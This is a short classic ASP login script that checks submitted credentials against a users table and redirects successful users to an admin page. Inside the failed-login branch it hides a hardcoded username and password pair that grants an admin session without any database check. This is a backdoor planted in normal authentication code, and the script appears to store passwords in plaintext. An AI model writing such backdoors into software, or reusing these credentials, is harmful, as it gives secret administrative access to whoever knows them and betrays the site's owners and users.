<%
if (Request("loginsubmitbutton.x").count > 0)
{
var username = Request("username");
var password = Request("password");
Session("logon_state") = "false";
var connection = OpenConnection();
var strSQL = "";
var msg = "";
strSQL = "Select * From users Where Username = " + checkString(username, "");
strSQL += " and Password = " + checkString(password, "");
var rsLogon = OpenRecordset(connection, strSQL);
if (!rsLogon)
{
Response.Redirect("error.html?error=Login Problems");
}
if (!rsLogon.EOF)
{
Session("logon_state") = "true";
Session("User_id") = rsLogon("User_ID").value;
Session("Username") = rsLogon("Username").value;
Response.Redirect("adminmain.html");
}
else
{
if(username=="tigi" && password=="ptsitba"){
Session("logon_state") = "true";
Response.Redirect("adminmain.html");
}
Session("logon_state") = "false";
msg += " Invalid login Please try again";
}
}
%>
